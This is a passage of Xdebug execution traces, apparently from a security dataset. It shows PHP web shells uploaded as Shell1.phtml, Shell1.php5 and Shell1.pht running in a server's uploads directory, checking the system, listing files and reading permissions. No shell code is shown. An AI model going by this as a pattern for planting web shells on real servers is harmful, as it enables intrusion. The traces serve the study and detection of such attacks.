1 A /var/www/html/uploads/Shell1.phtml 33 $i = 0
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
1 A /var/www/html/uploads/Shell1.phtml 33 $i++
2 12 0 0.001022 448144 scandir 0 /var/www/html/uploads/Shell1.phtml 160 1 '/var/www/html/uploads'
2 12 1 0.001054 448768
2 12 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.phtml', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/Shell1.phtml 160 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.phtml', 4 => 'data', 5 => 'prepend.php']
2 13 0 0.001092 448784 is_dir 0 /var/www/html/uploads/Shell1.phtml 181 1 '/var/www/html/uploads/.'
2 13 1 0.001108 448848
2 13 R TRUE
2 14 0 0.001122 448816 is_dir 0 /var/www/html/uploads/Shell1.phtml 181 1 '/var/www/html/uploads/..'
2 14 1 0.001137 448864
2 14 R TRUE
2 15 0 0.001150 448824 is_dir 0 /var/www/html/uploads/Shell1.phtml 181 1 '/var/www/html/uploads/.htaccess'
2 15 1 0.001165 448864
2 15 R FALSE
2 16 0 0.001179 448832 is_dir 0 /var/www/html/uploads/Shell1.phtml 181 1 '/var/www/html/uploads/Shell1.phtml'
2 16 1 0.001193 448880
2 16 R FALSE
2 17 0 0.001206 448832 is_dir 0 /var/www/html/uploads/Shell1.phtml 181 1 '/var/www/html/uploads/data'
2 17 1 0.001220 448864
2 17 R TRUE
2 18 0 0.001234 448824 is_writable 0 /var/www/html/uploads/Shell1.phtml 190 1 '/var/www/html/uploads/data'
2 18 1 0.001251 448864
2 18 R TRUE
2 19 0 0.001269 448824 perms 1 /var/www/html/uploads/Shell1.phtml 190 1 '/var/www/html/uploads/data'
3 20 0 0.001282 448824 fileperms 0 /var/www/html/uploads/Shell1.phtml 265 1 '/var/www/html/uploads/data'
3 20 1 0.001295 448864
3 20 R 16895
2 A /var/www/html/uploads/Shell1.phtml 265 $perms = 16895
2 A /var/www/html/uploads/Shell1.phtml 265 $info = 'd'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'x'
2 19 1 0.001412 448864
2 19 R 'drwxrwxrwx'
2 21 0 0.001426 448824 is_writable 0 /var/www/html/uploads/Shell1.phtml 190 1 '/var/www/html/uploads/data'
2 21 1 0.001441 448864
2 21 R TRUE
2 22 0 0.001455 448832 is_dir 0 /var/www/html/uploads/Shell1.phtml 181 1 '/var/www/html/uploads/prepend.php'
2 22 1 0.001470 448880
2 22 R FALSE
2 23 0 0.001484 448824 is_file 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/.'
2 23 1 0.001498 448848
2 23 R FALSE
2 24 0 0.001511 448816 is_file 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/..'
2 24 1 0.001524 448864
2 24 R FALSE
2 25 0 0.001538 448824 is_file 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/.htaccess'
2 25 1 0.001552 448864
2 25 R TRUE
2 26 0 0.001565 448824 filesize 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001578 448864
2 26 R 64
1 A /var/www/html/uploads/Shell1.phtml 219 $size = 0.0625
2 27 0 0.001602 448768 round 0 /var/www/html/uploads/Shell1.phtml 219 2 0.0625 3
2 27 1 0.001615 448840
2 27 R 0.063
1 A /var/www/html/uploads/Shell1.phtml 219 $size = 0.063
1 A /var/www/html/uploads/Shell1.phtml 219 $size = '0.063 KB'
2 28 0 0.001652 448864 is_writable 0 /var/www/html/uploads/Shell1.phtml 228 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001668 448904
2 28 R FALSE
2 29 0 0.001681 448864 is_readable 0 /var/www/html/uploads/Shell1.phtml 229 1 '/var/www/html/uploads/.htaccess'
2 29 1 0.001696 448904
2 29 R TRUE
2 30 0 0.001709 448864 perms 1 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/.htaccess'
3 31 0 0.001721 448864 fileperms 0 /var/www/html/uploads/Shell1.phtml 265 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.001734 448904
3 31 R 33188
2 A /var/www/html/uploads/Shell1.phtml 265 $perms = 33188
2 A /var/www/html/uploads/Shell1.phtml 265 $info = '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 30 1 0.001848 448904
2 30 R '-rw-r--r--'
2 32 0 0.001862 448864 is_writable 0 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.001877 448904
2 32 R FALSE
2 33 0 0.001890 448864 is_readable 0 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.001905 448904
2 33 R TRUE
2 34 0 0.001923 448984 is_file 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/Shell1.phtml'
2 34 1 0.001937 449032
2 34 R TRUE
2 35 0 0.001950 448992 filesize 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/Shell1.phtml'
2 35 1 0.001962 449032
2 35 R 9316
1 A /var/www/html/uploads/Shell1.phtml 219 $size = 9.09765625
2 36 0 0.001986 448888 round 0 /var/www/html/uploads/Shell1.phtml 219 2 9.09765625 3
2 36 1 0.001999 448960
2 36 R 9.098
1 A /var/www/html/uploads/Shell1.phtml 219 $size = 9.098
1 A /var/www/html/uploads/Shell1.phtml 219 $size = '9.098 KB'
2 37 0 0.002039 448992 is_writable 0 /var/www/html/uploads/Shell1.phtml 228 1 '/var/www/html/uploads/Shell1.phtml'
2 37 1 0.002054 449032
2 37 R FALSE
2 38 0 0.002068 448992 is_readable 0 /var/www/html/uploads/Shell1.phtml 229 1 '/var/www/html/uploads/Shell1.phtml'
2 38 1 0.002081 449032
2 38 R TRUE
2 39 0 0.002094 448992 perms 1 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/Shell1.phtml'
3 40 0 0.002106 448992 fileperms 0 /var/www/html/uploads/Shell1.phtml 265 1 '/var/www/html/uploads/Shell1.phtml'
3 40 1 0.002118 449032
3 40 R 33204
2 A /var/www/html/uploads/Shell1.phtml 265 $perms = 33204
2 A /var/www/html/uploads/Shell1.phtml 265 $info = '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 39 1 0.002232 449032
2 39 R '-rw-rw-r--'
2 41 0 0.002246 448992 is_writable 0 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/Shell1.phtml'
2 41 1 0.002260 449032
2 41 R FALSE
2 42 0 0.002273 448992 is_readable 0 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/Shell1.phtml'
2 42 1 0.002287 449032
2 42 R TRUE
2 43 0 0.002300 448984 is_file 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/data'
2 43 1 0.002314 449016
2 43 R FALSE
2 44 0 0.002327 448984 is_file 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/prepend.php'
2 44 1 0.002342 449032
2 44 R TRUE
2 45 0 0.002355 448992 filesize 0 /var/www/html/uploads/Shell1.phtml 219 1 '/var/www/html/uploads/prepend.php'
2 45 1 0.002368 449032
2 45 R 57
1 A /var/www/html/uploads/Shell1.phtml 219 $size = 0.0556640625
2 46 0 0.002392 448888 round 0 /var/www/html/uploads/Shell1.phtml 219 2 0.0556640625 3
2 46 1 0.002405 448960
2 46 R 0.056
1 A /var/www/html/uploads/Shell1.phtml 219 $size = 0.056
1 A /var/www/html/uploads/Shell1.phtml 219 $size = '0.056 KB'
2 47 0 0.002441 448992 is_writable 0 /var/www/html/uploads/Shell1.phtml 228 1 '/var/www/html/uploads/prepend.php'
2 47 1 0.002456 449032
2 47 R FALSE
2 48 0 0.002470 448992 is_readable 0 /var/www/html/uploads/Shell1.phtml 229 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002485 449032
2 48 R TRUE
2 49 0 0.002497 448992 perms 1 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/prepend.php'
3 50 0 0.002510 448992 fileperms 0 /var/www/html/uploads/Shell1.phtml 265 1 '/var/www/html/uploads/prepend.php'
3 50 1 0.002523 449032
3 50 R 33261
2 A /var/www/html/uploads/Shell1.phtml 265 $perms = 33261
2 A /var/www/html/uploads/Shell1.phtml 265 $info = '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.phtml 265 $info .= 'x'
2 49 1 0.002637 449032
2 49 R '-rwxr-xr-x'
2 51 0 0.002651 448992 is_writable 0 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.002667 449032
2 51 R FALSE
2 52 0 0.002680 448992 is_readable 0 /var/www/html/uploads/Shell1.phtml 230 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002696 449032
2 52 R TRUE
1 3 1 0.002710 448928
0.002736 326280
TRACE END [2023-02-12 22:16:26.802371]
data/traces/119a2765baff7b5ef0ac567e74dfcc28_trace-1676254611.1641.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:17:17.061879]
1 0 1 0.000154 393528
1 3 0 0.000444 447520 {main} 1 /var/www/html/uploads/Shell1.php5 0 0
2 4 0 0.000461 447520 set_time_limit 0 /var/www/html/uploads/Shell1.php5 2 1 0
2 4 1 0.000478 447584
2 4 R FALSE
2 5 0 0.000493 447552 error_reporting 0 /var/www/html/uploads/Shell1.php5 2 1 0
2 5 1 0.000506 447592
2 5 R 22527
2 6 0 0.000519 447552 get_magic_quotes_gpc 0 /var/www/html/uploads/Shell1.php5 2 0
2 6 1 0.000532 447552
2 6 R FALSE
2 7 0 0.000546 447552 basename 0 /var/www/html/uploads/Shell1.php5 20 1 '/uploads/Shell1.php5'
2 7 1 0.000561 447624
2 7 R 'Shell1.php5'
1 A /var/www/html/uploads/Shell1.php5 20 $url = 'Shell1.php5'
2 8 0 0.000588 447592 php_uname 0 /var/www/html/uploads/Shell1.php5 27 0
2 8 1 0.000602 447704
2 8 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 9 0 0.000622 447592 getcwd 0 /var/www/html/uploads/Shell1.php5 31 0
2 9 1 0.000635 447640
2 9 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.php5 31 $path = '/var/www/html/uploads'
2 10 0 0.000660 447640 str_replace 0 /var/www/html/uploads/Shell1.php5 31 3 '\\' '/' '/var/www/html/uploads'
2 10 1 0.000676 447736
2 10 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.php5 31 $path = '/var/www/html/uploads'
2 11 0 0.000700 447640 explode 0 /var/www/html/uploads/Shell1.php5 31 2 '/' '/var/www/html/uploads'
2 11 1 0.000715 448216
2 11 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.php5 31 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.php5 31 $id = 0
1 A /var/www/html/uploads/Shell1.php5 31 $a = TRUE
1 A /var/www/html/uploads/Shell1.php5 31 $id = 1
1 A /var/www/html/uploads/Shell1.php5 33 $i = 0
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 31 $id = 2
1 A /var/www/html/uploads/Shell1.php5 33 $i = 0
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 31 $id = 3
1 A /var/www/html/uploads/Shell1.php5 33 $i = 0
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 31 $id = 4
1 A /var/www/html/uploads/Shell1.php5 33 $i = 0
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
1 A /var/www/html/uploads/Shell1.php5 33 $i++
2 12 0 0.000952 448144 scandir 0 /var/www/html/uploads/Shell1.php5 160 1 '/var/www/html/uploads'
2 12 1 0.000985 448768
2 12 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.php5', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/Shell1.php5 160 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.php5', 4 => 'data', 5 => 'prepend.php']
2 13 0 0.001024 448784 is_dir 0 /var/www/html/uploads/Shell1.php5 181 1 '/var/www/html/uploads/.'
2 13 1 0.001040 448848
2 13 R TRUE
2 14 0 0.001054 448816 is_dir 0 /var/www/html/uploads/Shell1.php5 181 1 '/var/www/html/uploads/..'
2 14 1 0.001069 448864
2 14 R TRUE
2 15 0 0.001082 448824 is_dir 0 /var/www/html/uploads/Shell1.php5 181 1 '/var/www/html/uploads/.htaccess'
2 15 1 0.001096 448864
2 15 R FALSE
2 16 0 0.001109 448832 is_dir 0 /var/www/html/uploads/Shell1.php5 181 1 '/var/www/html/uploads/Shell1.php5'
2 16 1 0.001123 448880
2 16 R FALSE
2 17 0 0.001135 448832 is_dir 0 /var/www/html/uploads/Shell1.php5 181 1 '/var/www/html/uploads/data'
2 17 1 0.001149 448864
2 17 R TRUE
2 18 0 0.001163 448824 is_writable 0 /var/www/html/uploads/Shell1.php5 190 1 '/var/www/html/uploads/data'
2 18 1 0.001186 448864
2 18 R TRUE
2 19 0 0.001200 448824 perms 1 /var/www/html/uploads/Shell1.php5 190 1 '/var/www/html/uploads/data'
3 20 0 0.001213 448824 fileperms 0 /var/www/html/uploads/Shell1.php5 265 1 '/var/www/html/uploads/data'
3 20 1 0.001227 448864
3 20 R 16895
2 A /var/www/html/uploads/Shell1.php5 265 $perms = 16895
2 A /var/www/html/uploads/Shell1.php5 265 $info = 'd'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'x'
2 19 1 0.001342 448864
2 19 R 'drwxrwxrwx'
2 21 0 0.001356 448824 is_writable 0 /var/www/html/uploads/Shell1.php5 190 1 '/var/www/html/uploads/data'
2 21 1 0.001371 448864
2 21 R TRUE
2 22 0 0.001385 448832 is_dir 0 /var/www/html/uploads/Shell1.php5 181 1 '/var/www/html/uploads/prepend.php'
2 22 1 0.001400 448880
2 22 R FALSE
2 23 0 0.001414 448824 is_file 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/.'
2 23 1 0.001429 448848
2 23 R FALSE
2 24 0 0.001442 448816 is_file 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/..'
2 24 1 0.001455 448864
2 24 R FALSE
2 25 0 0.001468 448824 is_file 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/.htaccess'
2 25 1 0.001482 448864
2 25 R TRUE
2 26 0 0.001494 448824 filesize 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/.htaccess'
2 26 1 0.001507 448864
2 26 R 64
1 A /var/www/html/uploads/Shell1.php5 219 $size = 0.0625
2 27 0 0.001531 448768 round 0 /var/www/html/uploads/Shell1.php5 219 2 0.0625 3
2 27 1 0.001545 448840
2 27 R 0.063
1 A /var/www/html/uploads/Shell1.php5 219 $size = 0.063
1 A /var/www/html/uploads/Shell1.php5 219 $size = '0.063 KB'
2 28 0 0.001581 448864 is_writable 0 /var/www/html/uploads/Shell1.php5 228 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001597 448904
2 28 R FALSE
2 29 0 0.001610 448864 is_readable 0 /var/www/html/uploads/Shell1.php5 229 1 '/var/www/html/uploads/.htaccess'
2 29 1 0.001624 448904
2 29 R TRUE
2 30 0 0.001638 448864 perms 1 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/.htaccess'
3 31 0 0.001651 448864 fileperms 0 /var/www/html/uploads/Shell1.php5 265 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.001664 448904
3 31 R 33188
2 A /var/www/html/uploads/Shell1.php5 265 $perms = 33188
2 A /var/www/html/uploads/Shell1.php5 265 $info = '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 30 1 0.001777 448904
2 30 R '-rw-r--r--'
2 32 0 0.001791 448864 is_writable 0 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/.htaccess'
2 32 1 0.001816 448904
2 32 R FALSE
2 33 0 0.001829 448864 is_readable 0 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.001844 448904
2 33 R TRUE
2 34 0 0.001863 448984 is_file 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/Shell1.php5'
2 34 1 0.001878 449032
2 34 R TRUE
2 35 0 0.001891 448992 filesize 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/Shell1.php5'
2 35 1 0.001903 449032
2 35 R 9316
1 A /var/www/html/uploads/Shell1.php5 219 $size = 9.09765625
2 36 0 0.001927 448888 round 0 /var/www/html/uploads/Shell1.php5 219 2 9.09765625 3
2 36 1 0.001945 448960
2 36 R 9.098
1 A /var/www/html/uploads/Shell1.php5 219 $size = 9.098
1 A /var/www/html/uploads/Shell1.php5 219 $size = '9.098 KB'
2 37 0 0.001985 448992 is_writable 0 /var/www/html/uploads/Shell1.php5 228 1 '/var/www/html/uploads/Shell1.php5'
2 37 1 0.002064 449032
2 37 R FALSE
2 38 0 0.002080 448992 is_readable 0 /var/www/html/uploads/Shell1.php5 229 1 '/var/www/html/uploads/Shell1.php5'
2 38 1 0.002095 449032
2 38 R TRUE
2 39 0 0.002108 448992 perms 1 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/Shell1.php5'
3 40 0 0.002121 448992 fileperms 0 /var/www/html/uploads/Shell1.php5 265 1 '/var/www/html/uploads/Shell1.php5'
3 40 1 0.002133 449032
3 40 R 33204
2 A /var/www/html/uploads/Shell1.php5 265 $perms = 33204
2 A /var/www/html/uploads/Shell1.php5 265 $info = '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 39 1 0.002246 449032
2 39 R '-rw-rw-r--'
2 41 0 0.002260 448992 is_writable 0 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/Shell1.php5'
2 41 1 0.002275 449032
2 41 R FALSE
2 42 0 0.002288 448992 is_readable 0 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/Shell1.php5'
2 42 1 0.002302 449032
2 42 R TRUE
2 43 0 0.002315 448984 is_file 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/data'
2 43 1 0.002330 449016
2 43 R FALSE
2 44 0 0.002343 448984 is_file 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/prepend.php'
2 44 1 0.002358 449032
2 44 R TRUE
2 45 0 0.002371 448992 filesize 0 /var/www/html/uploads/Shell1.php5 219 1 '/var/www/html/uploads/prepend.php'
2 45 1 0.002384 449032
2 45 R 57
1 A /var/www/html/uploads/Shell1.php5 219 $size = 0.0556640625
2 46 0 0.002408 448888 round 0 /var/www/html/uploads/Shell1.php5 219 2 0.0556640625 3
2 46 1 0.002421 448960
2 46 R 0.056
1 A /var/www/html/uploads/Shell1.php5 219 $size = 0.056
1 A /var/www/html/uploads/Shell1.php5 219 $size = '0.056 KB'
2 47 0 0.002456 448992 is_writable 0 /var/www/html/uploads/Shell1.php5 228 1 '/var/www/html/uploads/prepend.php'
2 47 1 0.002472 449032
2 47 R FALSE
2 48 0 0.002485 448992 is_readable 0 /var/www/html/uploads/Shell1.php5 229 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002500 449032
2 48 R TRUE
2 49 0 0.002512 448992 perms 1 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/prepend.php'
3 50 0 0.002525 448992 fileperms 0 /var/www/html/uploads/Shell1.php5 265 1 '/var/www/html/uploads/prepend.php'
3 50 1 0.002538 449032
3 50 R 33261
2 A /var/www/html/uploads/Shell1.php5 265 $perms = 33261
2 A /var/www/html/uploads/Shell1.php5 265 $info = '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'w'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'x'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'r'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= '-'
2 A /var/www/html/uploads/Shell1.php5 265 $info .= 'x'
2 49 1 0.002651 449032
2 49 R '-rwxr-xr-x'
2 51 0 0.002665 448992 is_writable 0 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/prepend.php'
2 51 1 0.002680 449032
2 51 R FALSE
2 52 0 0.002693 448992 is_readable 0 /var/www/html/uploads/Shell1.php5 230 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002709 449032
2 52 R TRUE
1 3 1 0.002728 448928
0.002768 326280
TRACE END [2023-02-13 00:17:17.064523]
data/traces/119a2765baff7b5ef0ac567e74dfcc28_trace-1676259613.8036.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:40:39.701470]
1 0 1 0.000150 393528
1 3 0 0.000440 447520 {main} 1 /var/www/html/uploads/Shell1.pht 0 0
2 4 0 0.000457 447520 set_time_limit 0 /var/www/html/uploads/Shell1.pht 2 1 0
2 4 1 0.000474 447584
2 4 R FALSE
2 5 0 0.000488 447552 error_reporting 0 /var/www/html/uploads/Shell1.pht 2 1 0
2 5 1 0.000501 447592
2 5 R 22527
2 6 0 0.000514 447552 get_magic_quotes_gpc 0 /var/www/html/uploads/Shell1.pht 2 0
2 6 1 0.000526 447552
2 6 R FALSE
2 7 0 0.000541 447552 basename 0 /var/www/html/uploads/Shell1.pht 20 1 '/uploads/Shell1.pht'
2 7 1 0.000565 447624
2 7 R 'Shell1.pht'
1 A /var/www/html/uploads/Shell1.pht 20 $url = 'Shell1.pht'
2 8 0 0.000593 447592 php_uname 0 /var/www/html/uploads/Shell1.pht 27 0
2 8 1 0.000606 447704
2 8 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 9 0 0.000626 447592 getcwd 0 /var/www/html/uploads/Shell1.pht 31 0
2 9 1 0.000639 447640
2 9 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.pht 31 $path = '/var/www/html/uploads'
2 10 0 0.000664 447640 str_replace 0 /var/www/html/uploads/Shell1.pht 31 3 '\\' '/' '/var/www/html/uploads'
2 10 1 0.000679 447736
2 10 R '/var/www/html/uploads'
1 A /var/www/html/uploads/Shell1.pht 31 $path = '/var/www/html/uploads'
2 11 0 0.000703 447640 explode 0 /var/www/html/uploads/Shell1.pht 31 2 '/' '/var/www/html/uploads'
2 11 1 0.000717 448216
2 11 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.pht 31 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/Shell1.pht 31 $id = 0
1 A /var/www/html/uploads/Shell1.pht 31 $a = TRUE
1 A /var/www/html/uploads/Shell1.pht 31 $id = 1
1 A /var/www/html/uploads/Shell1.pht 33 $i = 0
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 31 $id = 2
1 A /var/www/html/uploads/Shell1.pht 33 $i = 0
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 31 $id = 3
1 A /var/www/html/uploads/Shell1.pht 33 $i = 0
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 31 $id = 4
1 A /var/www/html/uploads/Shell1.pht 33 $i = 0
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
1 A /var/www/html/uploads/Shell1.pht 33 $i++
2 12 0 0.000953 448144 scandir 0 /var/www/html/uploads/Shell1.pht 160 1 '/var/www/html/uploads'
2 12 1 0.000985 448768
2 12 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.pht', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/Shell1.pht 160 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Shell1.pht', 4 => 'data', 5 => 'prepend.php']
2 13 0 0.001024 448784 is_dir 0 /var/www/html/uploads/Shell1.pht 181 1 '/var/www/html/uploads/.'
2 13 1 0.001040 448848
2 13 R TRUE
2 14 0 0.001054 448816 is_dir 0 /var/www/html/uploads/Shell1.pht 181 1 '/var/www/html/uploads/..'
2 14 1 0.001068 448864
2 14 R TRUE
